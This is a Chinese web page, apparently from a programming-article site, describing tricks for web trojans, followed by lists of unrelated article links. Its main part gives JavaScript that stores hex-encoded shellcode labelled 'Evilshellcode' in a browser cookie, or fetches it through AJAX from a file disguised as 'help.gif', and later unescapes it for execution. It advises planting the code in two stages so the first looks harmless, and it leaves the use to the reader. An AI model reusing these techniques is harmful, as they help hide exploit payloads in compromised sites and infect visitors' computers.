一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
JQuery扩展插件Validate 5添加自定义验证方法
Sep 05 Javascript
JavaScript 产生不重复的随机数三种实现思路
Dec 13 Javascript
无缝滚动js代码通俗易懂(自写)
Jun 19 Javascript
EasyUi datagrid 实现表格分页
Feb 10 Javascript
JavaScript类继承及实例化的方法
Jul 25 Javascript
Bootstrap插件全集
Jul 18 Javascript
Bootstrap 模态框实例插件案例分析
Dec 28 Javascript
详解Vue中状态管理Vuex
May 11 Javascript
jQuery.Ajax()的data参数类型详解
Jul 23 jQuery
详解Webstorm 新建.vue文件支持高亮vue语法和es6语法
Oct 26 Javascript
浅谈super-vuex使用体验
Jun 25 Javascript
JavaScript 绘制饼图的示例
Feb 19 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
Gregarius中文日期格式问题解决办法
2008/04/22 PHP
浅谈php正则表达式中的非贪婪模式匹配的使用
2014/11/25 PHP
10款PHP开源商城系统汇总介绍
2015/07/23 PHP
PHP中COOKIES使用示例
2015/07/26 PHP
Aster vs Newbee BO5 第二场2.19
2021/03/10 DOTA
Document对象内容集合(比较全)
2010/09/06 Javascript
javascript预览上传图片发现的问题的解决方法
2010/11/25 Javascript
javascript学习之闭包分析
2010/12/02 Javascript
js获取height和width的方法说明
2013/01/06 Javascript
页面实时更新时间的JS实例代码
2013/12/18 Javascript
node.js中的forEach()是同步还是异步呢
2015/01/29 Javascript
Java File类的常用方法总结
2015/03/18 Javascript
jQuery实现的手机发送验证码倒计时效果代码分享
2015/08/24 Javascript
js动态生成Html元素实现Post操作(createElement)
2015/09/14 Javascript
jQuery实现的图片轮播效果完整示例
2016/09/12 Javascript
基于jQuery实现歌词滚动版音乐播放器的代码
2016/09/17 Javascript
jQuery实现倒计时(倒计时年月日可自己输入)
2016/12/02 Javascript
jQuery向webApi提交post json数据
2017/01/16 Javascript
Vue声明式渲染详解
2017/05/17 Javascript
微信小程序实现动态设置页面标题的方法【附源码下载】
2017/11/29 Javascript
JS数组求和的常用方法实例小结
2019/01/07 Javascript
深入理解redux之compose的具体应用
2020/01/12 Javascript
Python使用Supervisor来管理进程的方法
2015/05/28 Python
Python中的数据对象持久化存储模块pickle的使用示例
2016/03/03 Python
Python解析命令行读取参数--argparse模块使用方法
2018/01/23 Python
Python实现的tcp端口检测操作示例
2018/07/24 Python
Django项目中添加ldap登陆认证功能的实现
2019/04/04 Python
python多任务之协程的使用详解
2019/08/26 Python
Python3实现zip分卷压缩过程解析
2019/10/09 Python
Python读取pdf表格写入excel的方法
2021/01/22 Python
澳大利亚在线百货商店:Real Smart
2017/08/13 全球购物
生物技术毕业生自荐信
2013/10/23 职场文书
企事业单位求职者的自我评价
2013/12/28 职场文书
党员证明信
2015/06/19 职场文书
Python基础知识之变量的详解
2021/04/14 Python
node.js如何自定义实现一个EventEmitter
2021/07/16 Javascript